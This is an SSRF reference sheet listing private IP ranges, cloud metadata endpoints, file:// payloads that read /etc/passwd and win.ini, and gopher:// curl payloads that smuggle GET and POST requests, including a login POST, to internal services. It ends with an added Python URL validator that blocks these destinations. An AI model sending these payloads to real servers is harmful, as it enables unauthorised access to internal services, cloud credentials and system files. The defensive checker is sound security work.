Server-Side Request Forgery (SSRF)

Established private IP address ranges

IP address range    Number of addresses
10.0.0.0/8          16,777,216
172.16.0.0/12       1,048,576
192.168.0.0/16      65,536

Internal metadata endpoints for cloud providers

AWS: 169.254.169.254
Google Cloud: metadata.google.internal

File scheme

# Linux
file:///etc/passwd

# Windows
file:///c:/windows/win.ini

Gopher

curl gopher://127.0.0.1:9000/hello_gopher

# GET via Gopher
curl gopher://127.0.0.1:9000/_GET%20/hello_gopher%20HTTP/1.1

# POST via Gopher
curl gopher://127.0.0.1:80/_POST%20/status%20HTTP/1.1%0a

# Note: this requires double URL-encoding when using curl or Burp Suite
gopher://backend:80/_POST /login HTTP/1.1
Content-Length: 41
Content-Type: application/x-www-form-urlencoded

username=white.rabbit&password=dontbelate

------------------------------------------------------

gopher://localhost:9090/_POST%20/login%20HTTP/1.1%0aContent-Length:%2041%0aContent-Type:%20application/x-www-form-urlencoded%0a%0ausername=white.rabbit%26password=dontbelate
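
A server-side check that rejects the destinations listed in these notes (private ranges, metadata endpoints, file:// and gopher:// URLs), added here as an example and not part of the original notes. The names check_url, system_resolver, sample_resolver and the SAMPLE_DNS map are hypothetical, the sample addresses are constructed, and the loopback and link-local ranges are added to cover 127.0.0.1 and 169.254.169.254.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}            # rejects file:// and gopher://
BLOCKED_HOSTS = {"metadata.google.internal"}   # metadata name listed in these notes
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",  # private ranges from the table
    "127.0.0.0/8", "::1/128",                         # loopback (127.0.0.1, localhost)
    "169.254.0.0/16",                                 # link-local, holds 169.254.169.254
)]

def system_resolver(host):
    """Resolve a host name (or IP literal) to the set of addresses it maps to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def check_url(url, resolver=system_resolver):
    """Return (allowed, reason) for a user-supplied URL the server is asked to fetch."""
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").rstrip(".").lower()
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if not host:
        return False, "missing host"
    if host in BLOCKED_HOSTS:
        return False, "blocked host name"
    try:  # judge the resolved addresses, not the text of the URL
        ips = [ipaddress.ip_address(a.split("%")[0]) for a in resolver(host)]
    except (OSError, ValueError):
        return False, "host does not resolve"
    for ip in ips:
        if ip.version == 6 and ip.ipv4_mapped:
            ip = ip.ipv4_mapped                # ::ffff:10.0.0.1 -> 10.0.0.1
        if any(ip in net for net in BLOCKED_NETS):
            return False, f"resolves to blocked address {ip}"
    return True, "ok"

# Constructed name-to-address map so the demo runs offline.
SAMPLE_DNS = {"backend": {"10.0.0.5"}, "localhost": {"127.0.0.1"},
              "example.com": {"93.184.216.34"}}

def sample_resolver(host):
    return SAMPLE_DNS.get(host, {host})        # IP literals map to themselves

if __name__ == "__main__":
    for u in ("file:///etc/passwd", "http://backend:80/login", "https://example.com/"):
        print(u, "->", check_url(u, sample_resolver))
```

In production the fetch has to connect to the address that passed this check and re-run the check on every redirect, otherwise the name can resolve differently at request time.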